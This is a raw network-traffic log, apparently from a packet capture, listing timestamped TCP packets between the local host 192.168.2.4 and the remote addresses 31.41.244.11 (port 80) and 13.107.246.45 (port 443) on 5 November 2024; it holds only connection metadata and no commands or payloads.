Nov 5, 2024 18:46:09.949992895 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.949997902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.950006962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.950012922 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.950018883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.950028896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.950031042 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.950048923 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.950068951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.954013109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.954062939 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.954072952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.954077959 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.954097033 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.954113960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.954125881 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.954161882 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.954355001 CET	443	49819	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.954737902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.954749107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.954758883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.954785109 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.954813957 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.954822063 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.954823971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.954829931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.954834938 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.954842091 CET	49819	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.954852104 CET	443	49819	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.954894066 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.954957962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.954967976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.954977989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.954984903 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.954988003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.954992056 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.954999924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955008984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955019951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.955024004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955038071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955044985 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.955050945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955060959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955061913 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.955096960 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.955102921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955113888 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955127954 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955133915 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.955142021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955159903 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.955190897 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.955216885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955229044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955238104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955248117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955252886 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.955260038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955265999 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.955282927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955293894 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.955317020 CET	49819	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.955322027 CET	443	49819	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.955353022 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.955518007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955528021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955542088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955569983 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.955594063 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.955622911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955632925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955651999 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955662012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955670118 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.955672026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955689907 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.955713987 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.955714941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955729961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955750942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955750942 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.955771923 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.955789089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955795050 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.955800056 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955807924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955822945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955827951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.955835104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955852985 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.955864906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955874920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955876112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.955881119 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955913067 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.955926895 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.955956936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955966949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.955976009 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956007957 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.956017017 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.956099987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956118107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956129074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956135988 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.956173897 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.956258059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956269026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956278086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956288099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956301928 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.956302881 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956312895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956320047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.956322908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956343889 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.956358910 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.956468105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956478119 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956489086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956517935 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.956528902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956538916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956542015 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.956548929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956558943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956568956 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.956578970 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.956605911 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.956721067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956731081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956741095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956749916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956760883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956769943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956772089 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.956780910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956790924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956794977 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.956800938 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956814051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956815004 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.956835985 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.956847906 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.956866026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956877947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956887960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956897974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956907988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.956909895 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.956918955 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.956948996 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.957061052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957071066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957081079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957091093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957101107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957102060 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.957112074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957120895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957123995 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.957130909 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957142115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957144976 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.957165003 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.957185984 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.957214117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957230091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957241058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957250118 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.957251072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957261086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957269907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957278013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.957278967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957283974 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.957309961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957318068 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.957320929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957329988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957344055 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.957351923 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957361937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957372904 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957379103 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.957393885 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.957417011 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.957556963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957578897 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957587957 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957607031 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.957617998 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.957642078 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957652092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957657099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957667112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957689047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.957695961 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.957739115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957783937 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.957793951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957803011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957813025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957843065 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.957851887 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.957930088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957940102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957948923 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957958937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957973957 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957978010 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.957983017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.957992077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.958003044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.958004951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.958013058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.958034039 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.958041906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.958061934 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.958091021 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.958117008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.958126068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.958132982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.958137989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.958168030 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.958190918 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.958198071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.958236933 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.958966017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.958975077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.958985090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.959011078 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.959033966 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.959058046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.959068060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.959076881 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.959089041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.959099054 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.959117889 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.959150076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.959160089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.959168911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.959178925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.959187984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.959191084 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.959204912 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.959230900 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.961452007 CET	443	49818	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.961812019 CET	49818	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.961836100 CET	443	49818	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.962138891 CET	49818	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.962143898 CET	443	49818	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.963921070 CET	443	49817	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.964071989 CET	443	49817	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.964133024 CET	49817	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.964184046 CET	49817	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.964193106 CET	443	49817	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.964204073 CET	49817	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.964207888 CET	443	49817	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.966686010 CET	49822	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.966712952 CET	443	49822	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.966808081 CET	49822	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.966926098 CET	49822	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.966938019 CET	443	49822	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.007730961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.007814884 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.007895947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.007906914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.007917881 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.007929087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.007936001 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.007971048 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.056417942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.056430101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.056440115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.056477070 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.056492090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.056503057 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.056504965 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.056513071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.056523085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.056533098 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.056535959 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.056556940 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.056577921 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.056730986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.056746006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.056756973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.056761980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.056768894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.056773901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.056785107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.056790113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.056901932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.056919098 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.056931019 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.056940079 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.056941032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.056952953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.056962967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.056974888 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.056984901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.056987047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.056997061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.057014942 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.057020903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.057025909 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.057060003 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.057092905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.057102919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.057112932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.057121992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.057137966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.057147980 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.057152987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.057172060 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.057192087 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.057255983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.057266951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.057286024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.057296991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.057305098 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.057308912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.057321072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.057332039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.057332993 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.057344913 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.057375908 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.057445049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.057456017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.057466984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.057492018 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.057512999 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.057544947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.057555914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.057564974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.057576895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.057585955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.057586908 CET	49804	80	192.168.2.4	31.41.244.11
